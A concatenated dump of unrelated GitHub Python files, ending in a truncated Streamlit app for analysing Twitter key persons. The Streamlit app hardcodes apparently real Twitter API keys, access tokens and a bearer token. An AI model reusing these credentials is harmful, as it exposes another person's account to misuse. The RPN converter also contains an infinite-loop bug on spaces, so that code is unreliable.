mode='max',\n monitor='val_categorical_accuracy',\n save_best_only=True)\n\n training_model.fit(training_data, validation_data=validation_data, epochs=epoch_amt,\n callbacks=[tensorboard_callback, checkpoint], verbose=True)\n\n if save:\n training_model.save(\"model\")\n tfjs.converters.save_keras_model(training_model, \"js_model\")\n\n return training_model\n\n\n# Takes in an audio file and model and returns predicted bird\ndef predict_file(file_path):\n global model\n image = preprocess(file_path, False)\n image = image.numpy().reshape(1, 224, 224, 3)\n predicted_label = model.predict([image], verbose=False)\n return predicted_label\n\n\n# Takes in audio file and prints a detailed description of the prediction\ndef detailed_prediction(file_path, show_amount):\n global label_encoder\n prediction = predict_file(file_path)[0]\n max_indexes = np.argpartition(prediction, -show_amount)[-show_amount:]\n max_indexes = max_indexes[np.argsort(prediction[max_indexes])]\n max_indexes = np.flip(max_indexes)\n for index in range(len(max_indexes)):\n confidence = prediction[max_indexes[index]]\n class_prediction = label_encoder.inverse_transform([max_indexes[index]])\n print(class_prediction + \" with \" + str(round(confidence * 100, 2)) + \"% confidence\")\n\n\n# Takes in csv dataframe and prints out one by one the success of a prediction on each file\ndef predict_all(df):\n global label_encoder\n count = 0\n correct = 0\n\n for index_num, row in df.iterrows():\n count += 1\n prediction = predict_file(\"./Data/Audio/\" + row[\"primary_label\"] + \"/\" + row[\"filename\"])\n classes_x = np.argmax(prediction, axis=1)\n prediction_class = label_encoder.inverse_transform(classes_x)\n if prediction_class[0] == row[\"common_name\"]:\n correct += 1\n print(str(correct / count) + \": \" + row[\"common_name\"] + \" - \" + prediction_class)\n print(\"FINAL RESULT: \" + str(correct / count))\n\n\n# Takes in the testing data, training data, and dataframe of training csv and prints out some checks\ndef check_model(testing_data, df, show_amount):\n global model\n\n print(\"EVALUATING ON TESTING DATA\")\n model.evaluate(testing_data)\n\n test_file = \"./Data/Audio/acafly/XC31063.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/amecro/XC80525.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/banswa/XC138873.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/caltow/XC126344.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n test_file = \"./Data/Audio/foxspa/XC120607.ogg\"\n print(\"PREDICTING \" + test_file)\n detailed_prediction(test_file, show_amount)\n\n print(\"EVALUATING ON ALL DATA\")\n predict_all(df[::100])\n\n\nif __name__ == \"__main__\":\n TRAINING_SIZE = .60\n VALIDATION_SIZE = .20\n BATCH_SIZE = 16\n EPOCH_AMOUNT = 10\n SHOW_AMOUNT = 5\n label_encoder = LabelEncoder()\n\n dataset, label_count, saved_df = load_data(cutoff=\"amewig\")\n dataset = dataset.shuffle(buffer_size=75000, seed=0)\n\n training_size = int(len(dataset) * TRAINING_SIZE)\n validating_size = int(len(dataset) * VALIDATION_SIZE)\n testing_size = int(len(dataset) - training_size - validating_size)\n\n train = dataset.take(training_size)\n testing_dataset = dataset.skip(training_size)\n validation = testing_dataset.skip(validating_size)\n testing = testing_dataset.take(validating_size)\n\n train = setup_training_data(train, BATCH_SIZE)\n validation = setup_non_training_data(validation, BATCH_SIZE)\n testing = setup_non_training_data(testing, BATCH_SIZE)\n\n \"\"\"\n for x in train:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n for x in validation:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n for x in testing:\n print(np.min(x[0][0].numpy()))\n print(np.max(x[0][0].numpy()))\n plt.imshow(x[0][0].numpy())\n plt.show()\n break\n \"\"\"\n\n #model = keras.models.load_model(\"best_model\")\n model = train_model(training_model=None, training_data=train, validation_data=validation, num_labels=label_count,\n epoch_amt=EPOCH_AMOUNT, save=True)\n # Accuracy on data\n check_model(testing_data=testing, df=saved_df, show_amount=SHOW_AMOUNT)\n#\n # tensorboard --logdir=logs/fit --host localhost --port 8088","repo_name":"Schwar32/SE-Machine-Learning","sub_path":"PureCNN-DataLoader.py","file_name":"PureCNN-DataLoader.py","file_ext":"py","file_size_in_byte":10745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31682734741","text":"from ludwig.api import LudwigModel\nimport click\n\n\n@click.command\n@click.option(\n \"--data-file-path\",\n \"-f\",\n type=click.Path(exists=True),\n help=\"Path to data file to run the inference\",\n required=True,\n)\n@click.option(\n \"--model-dir\",\n \"-m\",\n type=click.Path(exists=True),\n help=\"Path to the trained model directory\",\n required=True,\n)\ndef main(data_file_path, model_dir):\n model = LudwigModel.load(model_dir)\n predictions, _ = model.predict(dataset=data_file_path)\n predictions = predictions[\n [\n \"label_predictions\",\n \"label_probabilities_0\",\n \"label_probabilities_1\",\n \"label_probabilities_2\",\n \"label_probabilities_3\",\n \"label_probabilities_4\",\n \"label_probabilities_5\",\n ]\n ]\n predictions.to_csv(\"predictions.csv\")\n\n\nif __name__ == \"__main__\":\n # pylint: disable=no-value-for-parameter\n main()\n","repo_name":"guptashrey/AutoML-with-Ludwig","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14377518358","text":"import os\nimport time\n\nclass Configuration(object):\n \n '''參數設定'''\n def __init__(self):\n\n '''訓練資料路徑'''\n self.training_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Learning_set\"\n self.testing_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Full_Test_Set\"\n\n '''測試集'''\n self.contest_testing_data_folder = \"/app/data/phm-ieee-2012-data-challenge-dataset-master/Test_set\"\n\n '''執行檔路徑'''\n working_dir = os.getcwd() #返還main.py檔案資料夾\n self.featured_data_folder = os.path.join(working_dir, \"assets/feature_data\")\n self.model_folder = os.path.join(working_dir, \"assets/models\")\n\n '''訓練參數'''\n self.lag_feature_number = 15\n self.rul_upper_bound = 750\n\n \n\n\n","repo_name":"myfirstjump/BearingRULPrediction","sub_path":"py_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33026769098","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\n# First Request\r\n# def index(request):\r\n# \treturn HttpResponse(\"Hello World\")\r\n\r\n# Second Request\r\nfrom .forms import StudentForm\r\n\r\ndef index(request):\r\n\tif request.method=='POST':\r\n\t\tform = StudentForm(request.POST)\r\n\t\tif form.is_valid:\r\n\t\t\tform.save()\r\n\tform = StudentForm()\r\n\treturn render(request,'index.html',{'form':form})\r\n","repo_name":"Harshvalecha31/Django_Testing_End_to_End","sub_path":"firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17228993679","text":"import os\nimport sys\nimport shutil\nimport json\nimport re\n\nfrom datetime import datetime\nfrom osgeo import ogr, osr\n\n\n# copied from stitch_ifgs.get_union_polygon()\ndef get_union_polygon(ds_files):\n \"\"\"\n Get GeoJSON polygon of union of IFGs.\n :param ds_files: list of .dataset.json files, which have the 'location' key\n :return: geojson of merged bbox\n \"\"\"\n\n geom_union = None\n for ds_file in ds_files:\n f = open(ds_file)\n ds = json.load(f)\n geom = ogr.CreateGeometryFromJson(json.dumps(ds['location'], indent=2, sort_keys=True))\n if geom_union is None:\n geom_union = geom\n else:\n geom_union = geom_union.Union(geom)\n return json.loads(geom_union.ExportToJson()), geom_union.GetEnvelope()\n\n\ndef get_dataset_met_json_files(cxt):\n \"\"\"\n returns 2 lists: file paths for dataset.json files and met.json files\n :param cxt: json from _context.json\n :return: list[str], list[str]\n \"\"\"\n pwd = os.getcwd()\n localize_urls = cxt['localize_urls']\n\n met_files, ds_files = [], []\n for localize_url in localize_urls:\n local_path = localize_url['local_path']\n slc_id = local_path.split('/')[0]\n slc_path = os.path.join(pwd, slc_id, slc_id)\n\n ds_files.append(slc_path + '.dataset.json')\n met_files.append(slc_path + '.met.json')\n return ds_files, met_files\n\n\ndef get_scenes(cxt):\n \"\"\"\n gets all SLC scenes for the stack\n :param cxt: contents for _context.json\n :return: list of scenes\n \"\"\"\n localize_urls = cxt['localize_urls']\n all_scenes = set()\n for localize_url in localize_urls:\n local_path = localize_url['local_path']\n slc_id = local_path.split('/')[0]\n all_scenes.add(slc_id)\n return sorted(list(all_scenes))\n\n\ndef get_min_max_timestamps(scenes_ls):\n \"\"\"\n returns the min timestamp and max timestamp of the stack\n :param scenes_ls: list[str] all slc scenes in stack\n :return: (str, str) 2 timestamp strings, ex. 20190518T161611\n \"\"\"\n timestamps = set()\n\n regex_pattern = r'(\\d{8}T\\d{6}).(\\d{8}T\\d{6})'\n for scene in scenes_ls:\n matches = re.search(regex_pattern, scene)\n if not matches:\n raise Exception(\"regex %s was unable to match with SLC id %s\" % (regex_pattern, scene))\n\n slc_timestamps = (matches.group(1), matches.group(2))\n timestamps = timestamps.union(slc_timestamps)\n\n min_timestamp = min(timestamps)\n max_timestamp = max(timestamps)\n return min_timestamp.replace('T', ''), max_timestamp.replace('T', '')\n\n\ndef create_list_from_keys_json_file(json_files, *args):\n \"\"\"\n gets all key values in each .json file and returns a sorted array of values\n :param json_files: list[str]\n :return: list[]\n \"\"\"\n values = set()\n for json_file in json_files:\n f = open(json_file)\n data = json.load(f)\n for arg in args:\n value = data[arg]\n values.add(value)\n return sorted(list(values))\n\n\ndef camelcase_to_underscore(name):\n s1 = re.sub('(.)([A-Z][a-z]+)', r'\\1_\\2', name)\n return re.sub('([a-z0-9])([A-Z])', r'\\1_\\2', s1).lower()\n\n\ndef get_key_and_convert_to_underscore(json_file_paths, key):\n \"\"\"\n read through all the json files in file paths, get the first occurrence of key and convert it to underscore\n :param json_file_paths: list[str]\n :param key: str\n :return: key and value\n \"\"\"\n for json_file in json_file_paths:\n f = open(json_file)\n data = json.load(f)\n if key in data.keys():\n underscore_key = camelcase_to_underscore(key)\n return underscore_key, data[key]\n return None, None\n\n\ndef generate_dataset_json_data(dataset_json_files, version):\n \"\"\"\n :param cxt: _context.json file\n :param dataset_json_files: list[str] all file paths of SLC's .dataset.json files\n :param version: str: version, ex. v1.0\n :return: dict\n \"\"\"\n dataset_json_data = dict()\n dataset_json_data['version'] = version\n\n sensing_timestamps = create_list_from_keys_json_file(dataset_json_files, 'starttime', 'endtime')\n dataset_json_data['starttime'] = min(sensing_timestamps)\n dataset_json_data['endtime'] = max(sensing_timestamps)\n\n geojson, image_corners = get_union_polygon(dataset_json_files)\n dataset_json_data['location'] = geojson\n\n return dataset_json_data\n\n\ndef generate_met_json_data(cxt, met_json_file_paths, dataset_json_files, version):\n \"\"\"\n :param cxt: _context.json file\n :param met_json_file_paths: list[str] all file paths of SLC's .met.json files\n :param dataset_json_files: list[str] all file paths of SLC's .dataset.json files\n :param version: str: version, ex. v1.0\n :return: dict\n \"\"\"\n met_json_data = {\n 'processing_start': os.environ['PROCESSING_START'],\n 'processing_stop': datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'version': version\n }\n\n first_occurrence_keys = [\n 'direction',\n 'orbitNumber',\n 'trackNumber',\n 'sensor',\n 'platform'\n ]\n for key in first_occurrence_keys:\n key, value = get_key_and_convert_to_underscore(met_json_file_paths, key)\n met_json_data[key] = value\n\n orbit_cycles = create_list_from_keys_json_file(met_json_file_paths, 'orbitCycle')\n met_json_data['orbit_cycles'] = orbit_cycles\n\n # generating bbox\n geojson, image_corners = get_union_polygon(dataset_json_files)\n coordinates = geojson['coordinates'][0]\n for coordinate in coordinates:\n coordinate[0], coordinate[1] = coordinate[1], coordinate[0]\n met_json_data['bbox'] = coordinates\n\n # list of SLC scenes\n scenes = get_scenes(cxt)\n met_json_data['scenes'] = scenes\n met_json_data['scene_count'] = len(scenes)\n\n # getting timestamps\n sensing_timestamps = create_list_from_keys_json_file(dataset_json_files, 'starttime', 'endtime')\n met_json_data['sensing_start'] = min(sensing_timestamps)\n met_json_data['sensing_stop'] = max(sensing_timestamps)\n met_json_data['timesteps'] = sensing_timestamps\n\n # additional information\n met_json_data['dataset_type'] = 'stack'\n\n return met_json_data\n","repo_name":"aria-jpl/topsstack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"75192103146","text":"#%%\nfrom bs4 import BeautifulSoup\n\n#%%\n# TEST------------------------------------------\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/gitprojects/call_graph_change_analyser/project_results/JKQtPlotter/.cache/JKQtPlotter/current/lib/jkqtplotter/jkqtpbaseplotterstyle.cpp.xml')\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/mt/sandbox/stuff/uvcannode_compact.xml')\nfile_curr_path = os.path.normpath(\n 'C:/Users/lopm/Documents/mt/sandbox/stuff/jkqtpbaseplotterstyle_compact.xml')\n#file_curr_path = os.path.normpath('C:/Users/lopm/Documents/mt/sandbox/stuff/function_names_Compact.xml')\n\n# graphs/jkqtpscatter.cpp.xml')\n#file_prev_path = os.path.normpath('C:/Users/lopm/Documents/gitprojects/call_graph_change_analyser/project_results/JKQtPlotter/.cache/JKQtPlotter/previous/lib/jkqtplotter/jkqtpbaseplotterstyle.cpp.xml')\n\n\n#%%\ndef get_xml_objects(file_path):\n with open(file_path, 'r') as f:\n xml_data = f.read()\n Bs_data = BeautifulSoup(xml_data, \"xml\")\n return Bs_data\n\ndef get_function_name(function_tag):\n \"\"\"\n Returns the name of the function from the tags name_detail[label] or if nested name, the name_detail's inside the name_tag .\n \n This function is used for getting the name of functions in the function declaration. \n It searches just within the direct children of the current tag.\n \n Parameters:\n function_tag (BeautifulSoup.Tag): The Tag to get the name from, it can be a function or a constructor\n \n Returns:\n str: The name of the funciton (eg. JKQTPSetSystemDefaultBaseStyle or JKQTBasePlotterStyle::loadSettings)\n int: The defined number of parameters for this function\n \n \"\"\"\n function_name = ''\n for name_tag_indirect in function_tag.findAll('name_tag', recursive=False):\n for ct in name_tag_indirect.children:\n if ct.name == 'name_detail':\n function_name = \"\".join((function_name, ct['label']))\n if ct.name == 'operator':\n function_name = \"\".join((function_name, ct['label']))\n for name_detail_direct in function_tag.findAll('name_detail', recursive=False):\n function_name = name_detail_direct['label']\n return function_name, len(function_tag.parameter_list.findAll('parameter', recursive=False))\n\n\n\n","repo_name":"GLopezMUZH/call_graph_change_analyser","sub_path":"call_graph_change_analyser/compact_xml_parsing_cpp.py","file_name":"compact_xml_parsing_cpp.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22590575093","text":"\n\ndef main():\n with open(\"expression.txt\", \"r\") as f:\n expression = f.readline()\n try:\n notation = reverse_polish_notation(expression)\n except Exception as e:\n print(e)\n else:\n print(\" \".join(notation))\n\n\ndef reverse_polish_notation(expression: str) -> list:\n output_queue = []\n \"\"\"输出队列\"\"\"\n op_stack = []\n \"\"\"操作符栈\"\"\"\n\n l = len(expression)\n i = 0\n while i < l:\n if str(expression[i]) == \" \":\n \"\"\"忽略空格\"\"\"\n continue\n if expression[i].isdigit() or expression[i] == '.':\n \"\"\"如果是数字则直接放入输出队列\"\"\"\n digit = []\n dot_flag = 0\n while expression[i].isdigit() or expression[i] == '.':\n if expression[i] == '.':\n dot_flag += 1\n if dot_flag > 1:\n raise ValueError(\"多余的小数点\")\n digit.append(expression[i])\n i += 1\n i -= 1\n output_queue.append(\"\".join(digit))\n elif is_operator(expression[i]):\n \"\"\"\n 如果是操作符则根据优先级进行出入栈操作\n 令读入操作符为 O1,栈顶操作符为 O2,当有:\n 1.O1 为左结合性且其运算优先级要小于或等于 O2 的\n 2.O1 为右结合性且运算优先级小于 O2\n 时,将 O2 从栈顶弹出放入输出队列中\n 然后将 O1 入栈\n \"\"\"\n while len(op_stack) > 0:\n top = op_stack[len(op_stack) - 1]\n is_left_assoc = left_assoc(expression[i])\n if (is_left_assoc and (op_precedence(expression[i]) <= op_precedence(top))) \\\n or ((not is_left_assoc) and (op_precedence(expression[i]) < op_precedence(top))):\n output_queue.append(op_stack.pop())\n else:\n break\n op_stack.append(expression[i])\n elif str(expression[i]) == \"(\":\n \"\"\"读入字符若为左括号则直接入栈\"\"\"\n op_stack.append(expression[i])\n elif str(expression[i]) == \")\":\n \"\"\"读入字符为右括号时将栈顶弹出放入输出队列,直到遇到左括号.将左括号弹出但不放入序列,若没有则抛出异常\"\"\"\n try:\n while True:\n s = op_stack.pop()\n if str(s) != \"(\":\n output_queue.append(s)\n else:\n break\n except IndexError:\n raise Exception(\"括号不匹配:缺少左括号\")\n else:\n \"\"\"读入其他字符抛出异常\"\"\"\n raise ValueError(\"未知的字符:\" + expression[i])\n i += 1\n\n while len(op_stack) > 0:\n \"\"\"将操作符栈中剩余操作符弹出放入输出队列,若遇到 '(' 或 ')' 则说明有异常的括号\"\"\"\n op = op_stack.pop()\n if str(op) == \"(\" or str(op) == \")\":\n raise Exception(\"括号不匹配:多余的括号\")\n output_queue.append(op)\n return output_queue\n\n\ndef op_precedence(op: str) -> int:\n if op == \"+\" or op == \"-\":\n return 1\n elif op == \"*\" or op == \"/\":\n return 2\n elif op == \"^\":\n return 3\n else:\n return 0\n\n\ndef is_operator(c: str) -> bool:\n operators = (\"+\", \"-\", \"*\", \"/\", \"^\")\n try:\n operators.index(c)\n except ValueError:\n return False\n else:\n return True\n\n\ndef left_assoc(c: str) -> bool:\n left_assoc_operator = (\"+\", \"-\", \"*\", \"/\")\n try:\n left_assoc_operator.index(c)\n except ValueError:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NicholasStone/Homeworks","sub_path":"Compilers/RPN.py","file_name":"RPN.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21522889944","text":"#\r\n# https://github.com/wukko/ubiart-secure-fat\r\n#\r\n# UbiArt secure_fat.gf file generator using existing IPK bundles by https://github.com/wukko\r\n# Tested on Just Dance 2015 - 2022 games on PC, Wii, Wii U, Nintendo Switch (NX).\r\n# This script should work for Rayman Legends/Origins and other UbiArt games too.\r\n#\r\n# This script includes all matching files in current directory and its subdirectories when used standalone. Keep this in mind when using it.\r\n#\r\n# Credit to me (https://github.com/wukko) is required when this script is used in other projects.\r\n\r\nimport os\r\n\r\n# Modify these variables for standalone use if needed\r\nout = \"secure_fat.gf\"\r\nbext = \".ipk\"\r\nignore = [\"patch\"]\r\np = [\"pc\", \"wiiu\", \"wii\", \"nx\", \"x360\", \"durango\", \"scarlett\", \"ps3\", \"orbis\", \"prospero\", \"ggp\"]\r\n\r\ndef nameOnly(name, ext):\r\n name = name.split('/')[len(name.split('/'))-1]\r\n for i in p:\r\n name = name.replace(ext, '').replace('_'+i, '')\r\n return name\r\n\r\ndef hashList(input):\r\n hashes = []\r\n with open(input, \"rb\") as f:\r\n f.read(16)\r\n filecount = int.from_bytes(f.read(4), \"big\")\r\n f.read(40)\r\n counter = 0\r\n while counter != filecount:\r\n f.read(16)\r\n f.read(int.from_bytes(f.read(4), \"big\"))\r\n f.read(int.from_bytes(f.read(4), \"big\"))\r\n hashes.append(f.read(4))\r\n f.read(16)\r\n counter += 1\r\n return hashes\r\n\r\ndef generateSecureFat(cwd, out, bext, ignore):\r\n bl = []\r\n\r\n for root, dir_names, file_names in os.walk(cwd):\r\n for f in file_names:\r\n path = os.path.join(root, f).replace(cwd, '')[1:]\r\n if path[-4:] == bext:\r\n bl.append(path)\r\n\r\n bl = [b for b in bl if not nameOnly(b, bext) in ignore]\r\n\r\n with open(out, \"wb\") as f:\r\n bundleCount = 0\r\n hashesCount = 0\r\n body = b''\r\n footer = b''\r\n for i in bl:\r\n ipkhash = hashList(i)\r\n hashesCount += len(ipkhash)\r\n ipkname = nameOnly(i, bext).encode()\r\n for h in ipkhash:\r\n body += h + b'\\x00\\x00\\x00\\x01' + bundleCount.to_bytes(1, \"big\")\r\n footer += bundleCount.to_bytes(1, \"big\") + len(ipkname).to_bytes(4, \"big\") + ipkname\r\n bundleCount = bundleCount + 1\r\n f.write(b'\\x55\\x53\\x46\\x54\\x1F\\x5E\\xE4\\x2F\\x00\\x00\\x00\\x01' + hashesCount.to_bytes(4, \"big\"))\r\n f.write(body)\r\n f.write(bundleCount.to_bytes(4, \"big\"))\r\n f.write(footer)\r\n\r\nif __name__ == \"__main__\":\r\n generateSecureFat(os.getcwd(), out, bext, ignore)\r\n","repo_name":"wukko/ubiart-secure-fat","sub_path":"generateSecureFat.py","file_name":"generateSecureFat.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39973395506","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom utils import logout\r\nfrom streamlit_extras.switch_page_button import switch_page\r\nimport os\r\nimport json\r\nimport datetime\r\nfrom datetime import datetime, timedelta\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport networkx as nx\r\nfrom pyvis.network import Network as net\r\nimport tweepy\r\nfrom streamlit_tags import st_tags\r\nfrom json import JSONEncoder\r\nimport PIL\r\nimport time\r\nimport nltk\r\nimport gensim\r\nimport pyLDAvis.gensim_models as gensimvis\r\nimport pyLDAvis\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\nimport pyLDAvis.gensim\r\nfrom matplotlib import font_manager, mathtext\r\nfrom pathlib import Path\r\n\r\nnltk.download('vader_lexicon')\r\n\r\n\r\nconsumer_key = \"1Hov50UKDBETZmY1wR9zkE3Q7\"\r\nconsumer_secret = \"lAAcJVSDE1Oyc1BuOmxJNN4D575NkHQcg3hEa5zeurrGwCpXH0\"\r\naccess_token = \"16645853-jRxQql8XCzcaWsBSTeA3eutXPA5xRcHxqRHDgx6m9\"\r\naccess_token_secret = \"STmNDeF9BX33PTYuE18vPq7yndA4okKroeq9LXX6FV2gk\"\r\nbearer_token = 'AAAAAAAAAAAAAAAAAAAAALMe9wAAAAAAN%2BggvuMVDLKLIEX3Kk%2B8nOSxH88%3DiBMoMLAjE4JuPUKzRyZjYbs5zRZ82uZk9T89YCBgKkeXmgbKY5'\r\n\r\naccounts = []\r\nauth = tweepy.OAuth1UserHandler(consumer_key=consumer_key, consumer_secret=consumer_secret, access_token=access_token, access_token_secret=access_token_secret)\r\n# auth.set_access_token(, 'ph47iEpbfD4USmwynPCL1LLNtl7f9seLovjIHOUqwTuQq')\r\napi = tweepy.API(auth)\r\nclient = tweepy.Client(bearer_token=bearer_token)\r\n\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nnltk.download('wordnet')\r\n\r\n\r\nst.set_page_config(page_title=\"Forteks | Twitter Analysis\", layout=\"wide\")\r\n\r\nhide_st_style = \"\"\"\r\n \r\n \"\"\"\r\nst.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nclass DateTimeEncoder(JSONEncoder):\r\n def default(self, o):\r\n if isinstance(o, datetime):\r\n return o.isoformat()\r\n return super().default(o)\r\n\r\n\r\n\r\n####################LOGOUT####################\r\nwith st. sidebar:\r\n if st.button(\"Logout\"):\r\n logout()\r\n switch_page('home')\r\n\r\n#################STARTPAGE###################\r\n\r\na, b = st.columns([1, 10])\r\n\r\nwith a:\r\n st.text(\"\")\r\n st.image(\"img/twitterlkogo.png\", width=100)\r\nwith b:\r\n st.title(\"Twitter Analysis\")\r\n###############################################\r\nlistTabs = [\r\n \"👨‍💼 Key Persons Analysis\",\r\n \"🦈 Issue Analysis\",\r\n \"📈 Data Mining\",\r\n \r\n]\r\n\r\nfont_css = \"\"\"\r\n\r\n\"\"\"\r\nst.write(font_css, unsafe_allow_html=True)\r\nwhitespace = 30\r\ntab1, tab2, tab3 = st.tabs([s.center(whitespace,\"\\u2001\") for s in listTabs])\r\n\r\nwith tab1:\r\n st.header(\"KEY PERSONS\")\r\n\r\n container1=st.container()\r\n with container1:\r\n folder_path = \"twittl\"\r\n files = os.listdir(folder_path)\r\n\r\n # Get the modification times of the files\r\n file_times = [(f, os.path.getmtime(os.path.join(folder_path, f))) for f in files]\r\n\r\n # Sort the files based on modification time in descending order\r\n sorted_files = sorted(file_times, key=lambda x: x[1], reverse=True)\r\n\r\n # Select the four newest files\r\n num_files = min(4, len(sorted_files))\r\n newest_files = [f[0] for f in sorted_files[:num_files]]\r\n\r\n # Update the 'files' variable with the names of the newest files\r\n files = newest_files\r\n\r\n if len(files) > 0:\r\n # Create a Streamlit column for each file\r\n cols = st.columns(num_files)\r\n\r\n for i, col in enumerate(cols):\r\n # Check if the file is in JSON format\r\n if i < num_files and files[i].endswith('.json'):\r\n # Open the file and read its contents as a JSON object\r\n with open(os.path.join(folder_path, files[i]), 'r') as f:\r\n user_data = json.load(f)\r\n \r\n # Access the follower count\r\n followers_count = user_data[\"tweets\"][0][\"user\"][\"followers_count\"]\r\n profilepic=user_data[\"tweets\"][0][\"user\"][\"profile_image_url_https\"]\r\n\r\n friend_count=user_data[\"tweets\"][0][\"user\"][\"friends_count\"]\r\n listed_count=user_data[\"tweets\"][0][\"user\"][\"listed_count\"]\r\n status=user_data[\"tweets\"][0][\"user\"][\"statuses_count\"]\r\n\r\n \r\n # Display the user data in the column\r\n col.image(profilepic, width=100)\r\n # col.write(f\"Account: {files[i].replace('_data.json', '')}\")\r\n col.write(f\"{user_data['name']}\")\r\n col.write(f\"{user_data['description']}\")\r\n col.write(f\"Tweets: {status}\")\r\n col.write(f\"Followers: {followers_count}\")\r\n col.write(f\"Friend: {friend_count}\")\r\n col.write(f\"Listed: {listed_count}\")\r\n\r\n ######################################CHART TIME SERIES#######################\r\n\r\n st.header(\"TIME SERIES ANALYSIS OF THE KEY PERSONs\")\r\n \r\n\r\n files = [os.path.join(folder_path, f) for f in os.listdir(folder_path) if f.endswith('.json')]\r\n # data = []\r\n df1 = None\r\n\r\n if files:\r\n data = []\r\n for file in files:\r\n with open(file, 'r') as f:\r\n file_data = json.load(f)\r\n for tweet in file_data['tweets']:\r\n data.append({\r\n 'name': tweet['user']['name'],\r\n 'date': pd.to_datetime(tweet['created_at'])\r\n })\r\n df1 = pd.DataFrame(data)\r\n\r\n # Create a list of available screen names\r\n if df1 is not None:\r\n names = list(df1['name'].unique())\r\n else:\r\n names = []\r\n\r\n # Set the default selected names to the first 4 accounts\r\n default_names = names[:4]\r\n\r\n # Set the default time range to one month from the current date\r\n end_date = pd.to_datetime(datetime.today(), utc=True)\r\n start_date = end_date - timedelta(days=30)\r\n\r\n # Create widgets for selecting the screen name and time range\r\n selected_names = st.multiselect('Select names to compare', names, default=default_names, key='selper')\r\n cols_ta, cols_tb = st.columns([1, 1])\r\n start_date = pd.to_datetime(cols_ta.date_input('Start date', value=start_date), utc=True)\r\n end_date = pd.to_datetime(cols_tb.date_input('End date', value=end_date), utc=True)\r\n\r\n # Filter the data based on the selected names and time range\r\n if df1 is not None:\r\n mask = (df1['name'].isin(selected_names)) & (df1['date'] >= start_date) & (df1['date'] <= end_date)\r\n df1_filtered = df1.loc[mask]\r\n else:\r\n df1_filtered = pd.DataFrame()\r\n\r\n if len(df1_filtered) > 0:\r\n df1_grouped = df1_filtered.groupby(['date', 'name']).size().reset_index(name='count')\r\n fig, ax = plt.subplots(figsize=(10, 6))\r\n sns.lineplot(data=df1_grouped, x='date', y='count', hue='name', ax=ax)\r\n ax.set_title(f\"Tweets per Day for {', '.join(selected_names)}\")\r\n ax.set_xlabel(\"Date\")\r\n ax.set_ylabel(\"Number of Tweets\")\r\n st.pyplot(fig)\r\n else:\r\n st.write(\"No data available for the selected time range and users.\")\r\n \r\n st.markdown(\"---\")\r\n\r\n #####################SNA########################\r\n st.header(\"SOCIAL NETWORK ANALYSIS OF THE KEY PERSONS\")\r\n # folder_path = 'twittl/'\r\n def get_followers_following_tweets(folder_path):\r\n followers = {}\r\n following = {}\r\n tweet_data = []\r\n\r\n for file_name in os.listdir(folder_path):\r\n if file_name.endswith('.json'):\r\n account = file_name.split('.')[0]\r\n with open(os.path.join(folder_path, file_name), 'r') as f:\r\n data = json.load(f)\r\n followers[account] = data['followers']\r\n following[account] = data['following']\r\n tweets = data['tweets']\r\n for tweet in tweets:\r\n tweet_info = {}\r\n tweet_info['id_str'] = tweet['id_str']\r\n tweet_info['created_at'] = tweet['created_at']\r\n tweet_info['full_text'] = tweet['full_text']\r\n tweet_info['user_mentions'] = tweet['entities']['user_mentions']\r\n tweet_info['retweeted_user'] = tweet['retweeted_status']['user']['screen_name'] if 'retweeted_status' in tweet else None\r\n tweet_info['in_reply_to_screen_name'] = tweet['in_reply_to_screen_name']\r\n tweet_info['tweet_url'] = f\"https://twitter.com/{account}/status/{tweet['id_str']}\"\r\n tweet_data.append(tweet_info)\r\n\r\n return followers, following, tweet_data\r\n\r\n def build_social_network(followers, following):\r\n G = nx.DiGraph()\r\n\r\n for account in followers.keys():\r\n G.add_node(account, title=account, label=account)\r\n\r\n for follower in followers[account]:\r\n G.add_edge(follower, account)\r\n\r\n for followee in following[account]:\r\n G.add_edge(account, followee)\r\n\r\n # Add 